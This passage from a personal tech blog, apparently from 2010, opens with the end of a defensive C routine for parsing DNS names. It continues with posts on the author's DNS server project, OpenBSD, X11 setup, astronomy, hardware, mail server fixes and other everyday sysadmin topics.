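        uint8_t b = msg[pos];          /* always a length/pointer octet here */

        if ((b & 0xc0) == 0xc0) {      /* compression pointer */
            if (pos + 1 >= len) return NAME_TRUNCATED;
            size_t target = ((size_t)(b & 0x3f) << 8) | msg[pos + 1];
            /* Only accept targets before the start of the labels being
             * read: every jump moves strictly backward, so no loops. */
            if (!allow_ptr || target < DNS_HDR_LEN || target >= seg_start)
                return NAME_POINTER;
            if (!jumped) { *next = pos + 2; jumped = 1; }
            pos = seg_start = target;
            continue;
        }
        if (b & 0xc0) return NAME_BAD_LABEL; /* 01 and 10 prefixes: no label */
        if (b == 0) {                  /* root label: end of name */
            if (!jumped) *next = pos + 1;
            if (o > 0) o--;            /* drop the trailing dot */
            out[o] = '\0';
            return NAME_OK;
        }
        size_t n = b;                  /* ordinary label of n data octets */
        if (pos + 1 + n > len) return NAME_TRUNCATED;
        wire += 1 + n;
        if (wire > 254) return NAME_TOO_LONG; /* 255 octets with the root */
        for (size_t i = 1; i <= n; i++) {
            uint8_t c = msg[pos + i];
            if (o + 6 > outlen)        /* \DDD + dot + NUL must still fit */
                return NAME_TOO_LONG;
            if (c > 0x20 && c < 0x7f && c != '.' && c != '\\')
                out[o++] = (char)c;
            else
                o += (size_t)snprintf(out + o, outlen - o, "\\%03u", (unsigned)c);
        }
        out[o++] = '.';
        pos += 1 + n;
    }
}

static char name_buf[1024];   /* results of the last decode() call */
static size_t name_end;

int decode(const uint8_t *msg, size_t len, size_t off, int allow_ptr)
{
    if (len < DNS_HDR_LEN || off < DNS_HDR_LEN) return NAME_TRUNCATED;
    return parse_name(msg, len, off, allow_ptr,
                      name_buf, sizeof name_buf, &name_end);
}

int main(void)
{
    int rc = decode(dumped_query, sizeof dumped_query, DNS_HDR_LEN, 0);
    printf("dumped query: rc=%d name=%s\n", rc, rc == NAME_OK ? name_buf : "-");
    printf("loop query:   rc=%d\n",
           decode(loop_query, sizeof loop_query, DNS_HDR_LEN, 1));
    rc = decode(backref_msg, sizeof backref_msg, 19, 1);
    printf("back pointer: rc=%d name=%s\n", rc, rc == NAME_OK ? name_buf : "-");
    return 0;
}
```

Run over the dumped payload, this walker meets the 0xc4 octet directly after a length octet of 01, so it is consumed as one byte of label data and the name decodes as `dr._dns-sd._udp.\196`.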


Wildcarddns at BETA_4

March 9th, 2010

Wildcarddnsd is now at BETA_4 tag. I've merged branch TTLPATCH to HEAD and tagged it. I also branched off BETA_4STABLE for errata and bug fixes between BETA_4 and BETA_5. I want to keep developing at HEAD from now on much like other open source projects, that's why I branch a stable branch because things could get broken between commits.

Here is a timeline of tags for Wildcarddnsd:

Of course wildcarddnsd carried a severe bug with it from initial commit to BETA_3. The bug was something like sending an NXDOMAIN to a RR that didn't exist. This had a negative impact on RR's of the same label on caching nameservers. In fact they were deleted in the caching nameservers. The fix was to send NOERROR, as a wildcarddnsd operator may have seen in the logs.

I'm looking for people who have an interest in DNS and have some C coding skills to help me with this project. The only other thing I require from them is some patience while I adjust to a group effort, which I have no experience in. Some things we need for this project are TCP support, EDNS0 support, DNSSEC support, AXFR (through cryptochannel) and perhaps Dynamic updates, also TXT support would be nice (very simple) and NS support for delegating zones to other nameservers (a bit harder).


Random Hackepedia

March 13th, 2010

The RH for this week is Termcap.


Happy Equinox

March 20th, 2010

It almost went by without me remembering. Happy Equinox! From Wikipedia:

An equinox occurs twice a year, when the tilt of the Earth's axis is inclined neither away from nor towards the Sun, the Sun being vertically above a point on the Equator...

In my own words it can also mean that the south pole is entering seasonal 24/7 darkness and the north pole is entering seasonal 24/7 light. The southern hemisphere is beginning autumn where the northern hemisphere is beginning spring.


Digital Camera

March 20th, 2010

My birthday was a few days ago and I got an Olympus X-925 Black camera from my parents. I never had a digital camera before and this one has 12 Mega Pixels! It's not a professional camera but the test photos I took turned out well. Perhaps I'll blog with some photos in the near future.

Here is a picture that I took of the sun with a welding filter before the lens. It didn't turn out great and I had to digitally remove all light and it's still bright which tells me the filter isn't all that great. But it's worth experimenting a little on what the camera's limits are.


OpenBSD 4.7 song pre-released

March 20th, 2010

Well OpenBSD has been pre-released. Pre-orders are being taken directly from the OpenBSD site or through OpenBSD Europe (which I did this time). The song was released to the public yesterday and can be heard here. I think the song is good, but it's not as geeky as the other ones IMO.

One thing about the song is the "I'm still here" which in my opinion is a take on the project leader who has been loyal to his project and hasn't gone off and made money elsewhere. I don't know how much he makes but I suspect the house is paid off and his salary is decent. It's nice that OpenBSD is still the way it was 10 years ago. People come and go though but the leader and focus is still the same.


Random Hackepedia

March 20th, 2010

The RH for this week is Windows.


Hackepedia changed its look

March 23rd, 2010

The image for hackepedia will change to this one as the old one is probably not relevant anymore.


Clear skies, no camera

March 24th, 2010

Well. We had clear skies tonight but I had no chance of making a picture of the southern sky. Also looking out I cannot make out the constellation Leo with the bare eyes. Too much LP (light pollution). However as you can see I have the Xephem program doing magical things. In the southern sky at 11PM tonight one should see Mars and Saturn as well as the Moon (further up). Xephem is really a great astronomy program.


WildcardDNSd, new features

March 27th, 2010

In the last 2 weeks or so Wildcarddnsd has gotten 2 major features. TXT RR support is one (which I did today) and NS delegations work now. Before they weren't working right. Also I extended the region support to IPv6 which was interesting.

Although these features are in HEAD I'm reluctant to CVS tag for BETA_5. It's too close still to the last BETA_4 tag. Perhaps in a month, I can consider this.


Random Hackepedia

March 27th, 2010

This week's RH is Dsp.


Random Hackepedia

April 2nd, 2010

The RH for this week is netstat.



Nothing to report

April 9th, 2010

I don't like putting 2 hackepedias back to back. Oh yeah I released beta_5 of wildcarddnsd and a patch to that on sourceforge, that's what I've been doing mainly these past few days.


Making X11 resolution work right with vmware guests (1920x1080)

April 15th, 2010

Generally I'm easy going. That means that when something is misconfigured, I don't care too much and find workarounds. For a while anyways. So to give you an example I had my new Kubuntu start up with a 800x600 screen under vmware and it didn't change resolution until I went into the system settings and clicked on the Display config, it then resized upon opening the program. Similarly in OpenBSD the resolution was 1024x768 or such so that there were "wings" of blackness on either side of my widescreen monitor.

All this I lived with for several months, but since I use OpenBSD as my main desktop it finally boiled down to me having to fix it. I googled. First hit had my answer. Someone said to use the program "gtf" to generate a Modeline for my monitor and stick it into the screen section. I tried that and it didn't work. They were wrong in that it was the "monitor" section it should have been put. Once I did that and having examined the /var/log/Xorg.0.log I noticed that my horizontal syncrate wasn't accepted. So I bumped it up to 90.0 and it finally worked. I want to share my Kubuntu /etc/X11/xorg.conf file with you, and very similar modifications also worked with OpenBSD, so here is:

Section "Device"
        Identifier      "Configured Video Device"
        Driver          "vmware"
EndSection

Section "Monitor"
        Identifier      "Configured Monitor"

        HorizSync       31.5 - 90.0
        VertRefresh     40 - 150

        # 1920x1080 @ 60.00 Hz (GTF) hsync: 67.08 kHz; pclk: 172.80 MHz
        Modeline "1920x1080_60.00"  172.80  1920 2040 2248 2576  1080 1081 1084 1118  -HSync +Vsync

EndSection

Section "Screen"
        Identifier      "Default Screen"
        Monitor         "Configured Monitor"
        Device          "Configured Video Device"
        DefaultDepth    24

        Subsection "Display"
                Depth 24
                Modes "1920x1080_60.00"
                Viewport 0 0 
        EndSubsection
EndSection

Hope it can be useful for others. Oh yeah, if you're curious why I run both Kubuntu and OpenBSD as desktops it's this: When I require flash I switch to Kubuntu, otherwise I do everything in OpenBSD. Most of the google tech talks I watch are watched with Linux.


Random Hackepedia

April 16th, 2010

The RH for this week is GPG.


Airport Extreme JetDirect port has changed?

April 16th, 2010

I've been googling a bit now to find out why the port 9100 on my parents airport extreme didn't work for JetDirect printing. I've found this. Apparently the port changed on some firmware updates from 9100 to 9101. I'll give this a shot tomorrow when I visit, as Rendezvous printing with an old 10.3.9 Mac OS X doesn't seem to work right on the setup that I got there.

Generally I'd portscan but nmap didn't compile on such an old version of Mac OS X.

Update: it's true it is on port 9101, although Mac OS X 10.3.9 doesn't have an option to configure the port right, I had to go into the cups webmanagement at localhost port 631 to make it work. Mac OS X 10.5.x (my dad's macbook) worked with configuring the jetdirect port to 9101 in the apple config system.


Changed graphics on website

April 18th, 2010

If you frequently come here to read this blog you may have noticed that the graphics changed. I spontaneously did this today and I like it. The main graphic is a triangle with a star (the sun) in its centroid all in the European colours. The star has nine points with three points to every side of the triangle. I made two pictures, one with a black background and one with a white background. The picture is supposed to represent the union between solarscale.de and centroid.eu which have been the same website under the two different names for a while now.


Random Hackepedia

April 23rd, 2010

The RH for this week is Cryptsetup.


Playing with compression, fail.

April 25th, 2010

I made a small program that can compress a file on less space than gzip. It was fun writing it and under nominal conditions it performs very well. The reason this design didn't make it into our list of programs is because if the conditions aren't favourable and it hits an out of disk space problem then repairing itself is next to impossible. So it isn't used. But you can still study the failings of programs to understand why working programs work well.

Inside the program source code you'll see a typescript clip from the program working better than gzip, but add a bit more space in the sparsefiles in the filesystem it explodes badly.


Random Hackepedia

April 30th, 2010

The RH for this week is Traceroute.

BTW if you're interested in contributing to hackepedia it now allows people to edit without logging in.


Educating the me

April 30th, 2010

I've started attending a class for CSS (cascading style sheets). The main purpose is that I have a lot of HTML documents (including this blog) that could use a bit of style. I've already written a style sheet for this blog in a test environment and will be putting it up perhaps next week.


Learning from Hackers

May 7th, 2010

I was once a system administrator. One system I administered was BSD/OS and it had a "gcc" group in /etc/group. The other administrators thought it was a good idea to restrict gcc to a set of people who asked to have gcc access. One guy didn't ask and he exploited the fact that the "ld" and "as" commands were not in the gcc group. He created an assembly file possibly with FreeBSD and then copied that over and assembled and linked the possibly very compatible assembly file. I thought the guy was brilliant and I want to show you rudimentarily what he did, watch.

romeo$ uname -a
FreeBSD romeo.solarscale.de 7.2-RELEASE FreeBSD 7.2-RELEASE #1: Wed May  5 21:28:23 CEST 2010     pjp@romeo.solarscale.de:/usr/src/sys/i386/compile/ROMEO  i386
romeo$ cat -n hello.c
     1  #include <stdio.h>
     2
     3  int
     4  main(void)
     5  {
     6          printf("hello, world\n");
     7  }
romeo$ cc -S -o hello.s hello.c
juliet$ uname -a
NetBSD juliet.solarscale.de 5.0.1 NetBSD 5.0.1 (GENERIC) #0: Thu Jul 30 01:39:11 UTC 2009  builds@b8.netbsd.org:/home/builds/ab/netbsd-5-0-1-RELEASE/i386/200907292356Z-obj/home/builds/ab/netbsd-5-0-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386
juliet$ as -o hello.o hello.s
juliet$ ld -static -o hello /usr/lib/crt0.o hello.o -lc
/usr/lib/crt0.o: In function `___start':
: undefined reference to `_fini'
/usr/lib/crt0.o: In function `___start':
: undefined reference to `_init'
juliet$ ld -static -o hello /usr/lib/crt?.o hello.o -lc
juliet$ ./hello
hello, world
juliet$ 

Let that be a lesson to anyone. I sure learned from this guy.



The non-latin character domain names

May 10th, 2010

This was all over the news a few days ago. Basically Egypt, Saudi Arabia and UAE now have the TLD (top level domain) in their language. The DNS system basically piggybacks a code (really punycode) representation of the unicode for these domains. It's still in ASCII down below, take a look:

country                 punycode equivalent
Egypt                   .XN--WGBH1C
Saudi Arabia            .XN--MGBERP4A5D4AR
United Arab Emirates    .XN--MGBAAM7A8H
source: IANA.ORG

So it's not a glitch in the system if you see something like domainname.xn--wgbh1c that's just egypt instead of its previous domainname.eg.


My new computer: conceived

May 10th, 2010

On January 27th, I blogged about my 24 year old history with computers. I have now decided on a new computer and it'll take a considerable chunk of my savings. The computer is going to be built with upgradeability in mind, so that 3, 5, 7 years down the road I can upgrade it to what is decent then. Basically I'll be getting an Intel Core i7-930 with 8 GB of RAM (2x4GB DDR3 modules) and a 160 GB Intel SSD, BluRay burner and a wicked socket 1366 motherboard. Also I'll get a semi-decent graphics card with 1 GB of RAM. The store I got an estimate on priced it all at 1625 Euros, and since I have to get some other things like speakers I'm counting on paying around 1700+ euros.

This computer by no means is a top-of the line, but it's powerful nonetheless and I think I can call it my own personal supercomputer. ;-)


Article in the BBC about IPv4 address exhaustion

May 11th, 2010

I think I've blogged about this before. The predicted date is September 9th, 2011 when all IPv4 addresses are given away. Here is the article. To quote the article...

Companies are being urged to get working with IPv6 now, to forestall any problems caused by the shortfall.


Added a bit of style (CSS)

May 13th, 2010

I've been attending 3 classes of learning how to use CSS (cascading style sheets) and I've learned a bit. These are the changes I've put in place after the first class and I like them. Notice the hovering on the right side that's new. Also if you went through this site a little you may have found the hackepedia backups which I've attempted to translate to German. That has a bit of style as well. Enjoy.

BTW have you noticed the changes on the English wikipedia as well?


OpenBSD 4.7 Install movie

May 13th, 2010

Like I usually do I make an install movie with vmware of the latest BSD. Here is OpenBSD 4.7:

To be honest I attempted this movie 3 times. There are some things I noticed while making it. First if you specify the X server to start immediately it's sorta hard getting a config file since "Xorg -configure" won't work with a running server. Second vmware seems to slow down with every attempt at making the movie so it drags on, just fast forward the parts that are slow.


Dan, Rest In Peace.

May 21st, 2010

You were a true friend. I'm saddened by your death.

"I wonder what life 500 years from now will think looking back at this period of time, and what it is we take for granted as fact now that will be proven ignorant somewhere along the way. Cool. :)" - Dan Moschuk, August 2009.


Registered Goldflipper.NET

May 25th, 2010

I registered goldflipper.net which was way overdue. I had this name on my VPS in Panama for a while and never registered the domain name. Well I did now and it does provide some IPv6 glue that I never had before, which is grand.

   Server Name: GOLDFLIPPER.NET
   IP Address: 2001:A60:F000:99:0:0:0:2
   IP Address: 200.46.208.61
   Registrar: CSL COMPUTER SERVICE LANGENBACH GMBH D/B/A JOKER.COM
   Whois Server: whois.joker.com
   Referral URL: http://www.joker.com

Nothing really changes, the domain is served with wildcarddnsd and points to the VPS in Panama and the IPv6 is served from my DSL.


New Computer, New tasks

May 26th, 2010

I totally forgot to blog about it. The computer that I "conceived" of as written below, well I got it. It cost more than I had hoped. Anyhow now I got a four core CPU and I want to put a bit of load on it. So I went back to seti@home and I'm running their windows 7 client. It's nice. I'm using all four processors in windows 7 with 25% load so it turns out about the same load as one core. I've already finished 2 workunits and I'm pretty happy.

Also notice the goldflipper image has changed. Before was ripped from somewhere and this one I drew all by myself.


Random Hackepedia

May 29th, 2010

The RH for this week is Tor.


My Internet-Registration Nightmare

June 1st, 2010

So I bought windows 7. For 199 euros. How stupid of me, let me explain why. When I bought Windows 7 I also bought vmware Workstation 7 as an upgrade to Workstation 6 so that it would make use of the graphics card's acceleration. Back then I still had my Athlon 64-3500+ and graphics acceleration didn't work on it. Anyhow back then I couldn't run 64-bit vm's either and I had to install Windows 7 in a 32-bit vm. When I got my new computer that changed. I copied the vm over to it and ran it for a while with no problems. So a few days ago I installed the 64-bit version of Windows 7 and gave it the activation code and didn't notice it didn't accept it until today (4 days later). When trying to activate with my activation code repeatedly it didn't work. So then I tried to get Microsoft support and they wanted a Product-Id (PID) code from me. Their website only showed how to get it for XP, Vista but not for Windows 7 so I painfully found it and entered it and then they said it expired. So I booted the 32-bit windows 7 vm and their website blew up.. it then said the other PID expired as well. So now I'm pretty well stuck with 32 bit windows 7 (boohoo) since it's at least activated. (What do people do when their computer blows up and they have to reinstall?). If you think that was all that's nothing. When I moved my anti-virus over it disabled the anti-virus on the 32 bit windows 7 and there is no knob to turn it off and give the subscription back to the 32 bit anti-virus. So now I got a 64 bit un-activated version with a working anti-virus and a 32 bit activated version with no working anti-virus. This is a major mess in my view and I'm not to blame, I simply tried to make use of a product I paid for and switching from 32 bit to 64 bit version is as innocent as it gets. This cost my mental health, I hate Microsoft for it. And for the first time with online registrations the Internet is as useful as a dead doorknob.



Saturn, Mars, Venus alignment on the 21st

June 2nd, 2010

I found this article on physorg talking about the alignment. So I fired up xephem and changed the time to 10 PM on June 21st in Frankfurt, Germany and this is what the western sky at an elevation of 41 degrees looks like when zoomed in a bit.

It may make a good snapshot. Also remember that the 21st is the Summer solstice. So the date is easy to remember.


Changed blog to PHP

June 5th, 2010

I've changed the blog to use PHP. I did this because of the following reasons:

Well I hope that explains it.


Random Hackepedia

June 6th, 2010

I forgot to do Hackepedia this Friday so here it is. Logging.


Facebook does IPv6

June 13th, 2010

I read that facebook is IPv6 capable at the address www.v6.facebook.com. This is great! I'll try it out when I get home.


What does the future hold?

June 14th, 2010

I have 4 sourceforge projects. Natally, Wildcarddnsd, Cryologd and twh. What is the future for them? Well I've given it a bit of thought on my summer break and here is the rough outline of the coding that I want to do.

Natally does tunneling real well, and it's encrypted. However, what I'd like to see from it is that it does address management as well so that clients connecting to it can connect to each other through the tunnels. Also when IPv6 comes along on my VPS I'd like to do a NAT feature for IPv6 because the addresses given to my VPS are going to be finite and I want to make use of them with the tunnels somewhat.

Wildcarddnsd is growing. The next big change planned for it is going to be a recursive server that allows all my nameserver settings in resolv.conf to be changed to my wildcarddnsd servers. The complexity is quite high so this may drag on. In my planning I've included an ascii drawing in the code for the code execution flow on how I think it should be done.

cryologd has been doing pretty well. Other than a condition where it exited for no reason (I think I got that fixed) there is not too much that needs to be done. One thing that the crypto code needs is an HMAC at the end of each frame for authentication which gets rid of the password exchange which may make this code a bit more robust and fluent. Changes going into cryologd can also be ported to natally as that's where it originated.

twh has been considered for removal on sourceforge. I don't plan to do development on it anymore but having the code resource on how to do the Berkeley DB stuff for example may be a good thing to have. Wish I had the time for it.


Random Hackepedia

June 18th, 2010

The RH for this week is Ohm's law.


The Milky Way Galaxy

June 26th, 2010

I came across this image on wikipedia...

I couldn't help but notice that the constellations were marked into it so that you have somewhat of an idea where the earth is (in relation to the sun). If you've been reading this blog continuously you might have seen pictures of Orion which was in the southern sky around midnight in winter. Now it's summer and almost in the southern sky at 12 midnight is Sagittarius. So then we're looking at the galactic center when it's summer, from our arm of Orion-Cygnus. This is really cool IMO, so then we're going to look at Cygnus constellation in Autumn and back to Orion in winter again. The southern sky around the ecliptic is a giant rotating window and it's fun to see the constellations. (The program xephem helped me a lot as well).

I'm going to try to give these abbreviations names for you:

Ori    Orion          December
Cma    Canis Major    January
Pup    Puppis         February
Vel    Vela           March
Cen    Centaurus      April
Nor    Norma          May
Sgr    Sagittarius    June
Aql    Aquila         July
Cyg    Cygnus         August
Cep    Cepheus        September
Cas    Cassiopeia     October
Aur    Auriga         November

More abbreviations of constellations are here. I've added the names of the month when the constellation is best seen at midnight looking south.


The Arecibo Message

June 27th, 2010

Given the chart in the article below then, here is the approximate path the Arecibo message is taking through our Galaxy. The Arecibo message was an attempt at seeing if making contact with another world was possible. Here is the wikipedia article on it.

As you can see the message will travel through a pretty big chunk of our Galaxy. It will probably have countless opportunities to be picked up. So far the message is probably 36 light years away from our planet. Also the message won't be travelling in a straight line either as Einstein's theory tells us that even light (or radio waves) will bend with influence of gravity from stars. This graphic is just an approximation.


The Summer Triangle

June 28th, 2010

Yesterday we were blessed with clear skies and I took the opportunity to take photos of the summer triangle, which consists of the stars Deneb, Vega (shown) and Altair at the vertices. We were lucky to get them all into one shot.

There is a large version found here.


Doing Docking@Home

June 29th, 2010

I was doing setiathome and einstein at home, but setiathome usually has no work to give and einstein at home always produced calculation errors with my boinc client. So now I've replaced einstein@home with Docking@home.

Docking@Home is a project which uses Internet-connected computers to perform scientific calculations that aid in the creation of new and improved medicines. The project aims to help cure diseases such as Human Immunodeficiency Virus (HIV).

When there is seti work one out of the two cpu threads work on it, and currently I have two threads working away at it (two is equivalent to one core).


The Korean incident: tcpwrappers

July 3rd, 2010

I was checking my logs yesterday when I noticed that someone from an IP in Korea was trying to brute force my pop3 daemon. I noticed after they got about 6000 attempts in. So I looked at wrapping them with tcpwrappers. The pop3 daemon on the outside of solarscale.de is Dovecot and they by default don't have tcp wrappers support. But there is a patch. So I applied it and noticed that some hunks of the patch failed. Particularly near the configure scripts so I ended up editing config.h myself and added the define for tcp wrappers in it. Then I built it and noticed that it would bomb out in 2 spots, all it needed was an edit in the Makefile to add "-lwrap" in the LIBS= line. Then it built. When it was installed I noticed that my changes to /etc/hosts.{allow,deny} were not effective. So I did a bit of googling and read that Dovecot is chrooted. So it was just a matter of finding the chroot and putting its own hosts.deny in there. It worked. So now only a select number of hosts can use the pop3 service.

goldflipper% telnet solarscale.de 110
Trying 62.75.160.180...
Connected to solarscale.de.
Escape character is '^]'.
Connection closed by foreign host.

The patch is found here.



Random Hackepedia

July 3rd, 2010

The RH for this week is Password.

This seems fitting since I just changed my passwords myself.


Fire has SSL support

July 7th, 2010

Believe it or not I have made an IRC client. It's called fire and I've coded SSL support into it yesterday and today. The SSL functionality seems to be stable, you can download the source code here.


Watching the ISS

July 9th, 2010

The past few days in Germany have been hot but the nights are cooler with mostly clear skies. This gave me an opportunity to see the ISS twice in the late evening (around 11PM). Once it was unexpected and we weren't sure what it was. The second time I got the data from the NASA sightings page, which is found here.

The space station looks like a flying jet but you'll notice that it doesn't blink nor does it have red and green lights. It's just a continuous and steady crossing of the sky mostly coming from the west towards the east. Without the moon and planets it's probably the brightest object in the sky as it zips at 28,000 km/h into the night. Anyhow it was a nice experience seeing this (it was my first time).


Random Hackepedia

July 16th, 2010

The RH for this week is Pid.


SSL_accept error from host: -1

August 2nd, 2010

My dad has a mac powerbook (or macbook or something) and I tried to make it work with my mail server. POP3 SSL worked but postfix SSL for SASL authenticated relay did not. I use a self-signed certificate and that was the problem. I couldn't paste the error message from the Apple Mail.app but it said something like the remote host did not accept SSL. I wasn't about to try it without SSL because the password is sent in the plain then. The postfix server gave this error message:

Aug  1 22:57:42 proteus postfix/smtpd[12251]: connect from p54AAB41C.dip.t-dialin.net[84.170.180.28]
Aug  1 22:57:42 proteus postfix/smtpd[12251]: SSL_accept error from p54AAB41C.dip.t-dialin.net[84.170.180.28]: -1
Aug  1 22:57:42 proteus postfix/smtpd[12251]: lost connection after STARTTLS from p54AAB41C.dip.t-dialin.net[84.170.180.28]

As a first diagnosis I tried the openssl s_client method to see if it can connect to my postfix server, and it could so it must have been in the Apple Mail. Also for self assurance it worked in Ubuntu and Windows 7 so why not in Mac OS X Leopard.

So I did a bit of googling and learned that Apple's mail program did not accept the certificate given to it because the hostname in the certificate was wrong and just gave up (in the process blaming the server for giving up!). There is a way to force it though. I downloaded the server's CA certificate file which has a .pem extension (this is not the private key!) and double clicked on it in Mac OS X.

smtpd_tls_CAfile = /etc/postfix/ssl/cacert.pem

It then asks you if you want to import this certificate into the keychain manager and from there you can tell the system to trust and allow this certificate everywhere. Soon after that I had to set the outgoing mail server again in Mail.app but it worked this time and a few test e-mails made it out SSL encrypted.

I thought I'd write this down as I'm probably going to be faced with it again some time in the future.


Random Hackepedia

August 6th, 2010

The RH for this week is Uid.


Cryologd fixes a memory leak

August 10th, 2010

The program in cryologd with the name of "cl" had a memory leak. It wasn't apparent when there was little data that it processed, but with lots of concatenated encrypted data which it decrypts to plaintext, the memory leak was apparent. 2 lines change, here is the source.


Random Hackepedia

August 14th, 2010

The RH for this week is One Way Hash.


Stupid Nettricks

August 21st, 2010

On February 24th, 2009 I blogged about the traceroute tricks. Here is the link. I've updated this to include IPv6 now and I've written a small hackish program that does this as well. This took up 1.5 days of mine for a show such as this:

cordelia$ traceroute6 mimas.centroid.eu 
traceroute6 to mimas.centroid.eu (2001:a60:f074::20) from 2001:a60:f074::1, 64 hops max, 12 byte packets
 1  xxx.hello.xxx.centroid.eu  1.066 ms  0.269 ms  0.378 ms
 2  xxx.why.xxx.centroid.eu  0.464 ms  0.503 ms  0.358 ms
 3  xxx.are.xxx.centroid.eu  0.614 ms  0.658 ms  0.897 ms
 4  xxx.you.xxx.centroid.eu  0.556 ms  0.361 ms  0.338 ms
 5  xxx.tracerouting6.xxx.centroid.eu  0.472 ms  0.499 ms  0.411 ms
 6  mimas.centroid.eu  0.3 ms  0.478 ms  0.318 ms
cordelia$ 

It's just vanity. It's a net-trick. Well at least I didn't play civilizations and waste time. In the meantime I've learned about divert(4) sockets in OpenBSD and even submitted a documentation fix for pf.conf(5).


Worry about IPv6?

August 22nd, 2010

Someone (tydel) made me aware of this article named Why you shouldn't worry about IPv6 just yet. I'd like to counter-argue this article somewhat. I'll focus on the highlights.

Cassidy says that "According to these networking experts, we're only a matter of months, or maybe weeks, from network Armageddon".

What you have to realize is that converting to IPv6 on the server side isn't the end of the migration. All your customers will have to move to IPv6 as well and some will be left behind because some owners of networks are probably a bit lazy to do a migration. So that means that if you want to run your business online, in order to get the full potential customer base you'll have to run IPv4 and IPv6 dual stacked so that you can satisfy both, until everyone is speaking IPv6. And since space is running out on IPv4 an IPv4 address may be a lot more expensive than an IPv6 address due to scarcity. Eventually there may not be any more IPv4 addresses to give out so this is the reason for doomsday calls.

Cassidy goes on to say "In fact, IPv6 starts to look a lot like IPv2 if you consider that the default v6 address for your machine finishes with its MAC address".

So I'm unsure what he means to say here. Perhaps he's worried that a MAC address is a secret thing and that if you know the MAC address you can use the MAC restricted access point? AFAIK an 802.11 packet encrypted or not still has 3 MAC addresses in its header (see /usr/src/sys/net80211/net80211.h) so these aren't secret to someone close to sniffing the radio. So he has no point really.

Cassidy goes to conclude in the second last paragraph: " Is there an IPv6 "killer app" yet for smaller networks? No. Is there any reason based on security or ease of management - unless you're running a 100.000-seat network or national-level ISP - for you to move up to it? No.".

I think he's wrong there. Sure there is no "killer app" unless you call facebook a killer app (but facebook runs on IPv4 as well). But it's especially the small ISP's that could benefit from a migration to IPv6. National level ISP's have huge resources and are out to compete with small ISPs and steal their customers, and IPv6 means independence from these large networks. It means that small ISP's keep their customers from switching to large ISP's that have IPv6 enabled. This is a bonus. Plus, being on a small ISP means that they give you something that the large ones don't and not usually the opposite.


Windows 95 turns 15

August 24th, 2010

This story was written August 25th, 1995. Windows 95 is now 15 years old. I never had Windows 95, 98 or 2000, but skipped them all other than XP and Windows 7. Back in 1995 I chose another true 32 bit Operating System. It was called Linux and I got it in spite of Windows 95. I think I made the right decision even though I switched to FreeBSD half a year later. It took only 2 odd years after this feat until I got a System Administration position at an ISP. I don't think I would have been a UNIX sysadmin had I installed Windows 95 back in 1995; it was a turning point.


Random Hackepedia

August 28th, 2010

The RH for this week is manual.


Randombot beta

September 5th, 2010

One reason why Google has so much market share is that other people who don't use advertising don't use their resources to their fullest. Even though this blog has advertising, it advertises on a voluntary basis and only for the open source projects (*BSD's). I looked at my server habits and noticed that I was using only 5-15GB of traffic out of the 512GB allotted to my VPS plan. That's only 3%. I decided that I wanted to raise that traffic a little, to perhaps 33%. Some people have suggested I put some porn on my website, but I don't have any porn to put up nor do I really want to serve pornography.

So I've written randombot. Randombot is a web spider that, instead of looking up Internet names, just queries IP addresses and looks for default web pages. I've been running it for 3 days now and it looks promising for raising my traffic. It also caches the content given to it; so far I have several hits, from business sites to a farm sitter operation in Australia. It delights me to see someone else's website that randombot found, even though I can't use someone's small business in Virginia or somewhere. And I would never _ever_ have come across these sites if I were to google. Anyhow, so far randombot is found at solarscale.de/randombot if anyone wants to check it out.

I do realise that there are a lot of websites that can't be reached because they don't use an IP solely for their website. That's tough. Also, if you happen to come across porn with randombot please report it and I'll remove it. I've found some shocking stuff with randombot that I've deleted already.


God didn't create the Universe?

September 6th, 2010

Stephen Hawking says god did not create the universe. I'm not such a believer in god. I'm not even sure if god is still alive. But I do believe that god created the universe. It may have been a lot smaller back then, but it had to be a mechanism that created it. And I call that mechanism god. God doesn't look like us I believe and I surely don't think god chose our earth to live out his days with us. No. God is somewhere else or dead, but what we have, the laws of nature, the universe and the possible multiverse were all created by this creature. If god didn't create the universe then I don't think it's a true god, but rather a steward to the creator. Not quite the same thing. Peace.


Randombot is off

September 8th, 2010

Well I got a cryptic email from the abuse department of my provider. Apparently I tripped over some honeypots and they thought randombot was a conficker.c type program. There go my plans on providing a search engine similar to Google! :-(. Randombot is off indefinitely.


The inside of uranus.centroid.eu

September 9th, 2010

It's my pride and joy. This (avi, 7MB) is uranus.centroid.eu. That's what it looked like on the first day I got it. I use the video to look inside it, to know which slots the RAM is in, where the vidcard is located, and to see what sort of expansion I can put into it. Right now it's changed a little. It has a second SSD card for the OS and I also put a PCI NIC in there for expansion of network stuff. There is also a chance that I'll be getting pluto, my parents' old computer; I'll be networking that to uranus then. Also worth mentioning is that I recently found out that I don't get lockups if I turn off Hyperthreading, but I just can't live without Hyperthreading, so I turned Speedstep off and it became just as stable.

PS: Yes, this is really uranus2, but the old uranus was renamed neptun (no e, for the German version of neptune) and my parents have it now. The next computer will likely be named saturn and then jupiter, mars, earth, venus, mercury, sun.


Pre-ordered OpenBSD 4.8

September 11th, 2010

Well, I just pre-ordered OpenBSD 4.8, for the maximum in Internet security. I bought it from OpenBSD Europe and with shipping, shipping insurance and paypal fees this cost 49.86 euros. Much better than the cost of Solaris these days. With every newer release OpenBSD releases a song. You can listen to it here.


Random Hackepedia

September 17th, 2010

The RH for this week is Syscall.


Wildcarddnsd recurses!

September 19th, 2010

Update: whoops, it has a bug that causes a flood on a set of nameservers. I'll have to fix that. I hope no one is testing this just yet.


Equinox in a few days

September 19th, 2010

Well it's here again, twice a year and this is the second time. Yes it's the Equinox. To be precise it's on September 23rd, at 3:09 UTC. It also marks the first day of autumn in the northern hemisphere. The southern hemisphere moves into spring.


Random Hackepedia

September 24th, 2010

The RH for this week is ctime.


Possible solution to lock-ups? Turn HT off.

September 30th, 2010

Ok so uranus.centroid.eu is a computer with the following specs:

The Operating System that runs on it is Ubuntu 10.04 LTS and gives this:
pjp@uranus:~$ uname -a
Linux uranus 2.6.32-24-generic #43-Ubuntu SMP Thu Sep 16 14:58:24 UTC 2010 x86_64 GNU/Linux
I run the Gnome desktop on it and now that Hyperthreading is turned off it has four not eight cpus. Basically I want to say to anyone who wants to buy such a system as mine to reconsider. I'm plagued with lock-ups and only now that I have turned hyperthreading off in the BIOS has it been stable (so far). The downside of having hyperthreading turned off is that programs start up slower in my opinion although they get a decent instructions per second benchmark from BOINC. I also run BOINC (seti@home) on this machine as well as Vmware Workstation 7.1.1 (x86_64 version) with at least 7 guests at any time.

Operating systems that run on this VMware Workstation are:

Occasionally I look at BIOS updates for the motherboard but as of last month I had the highest version available.

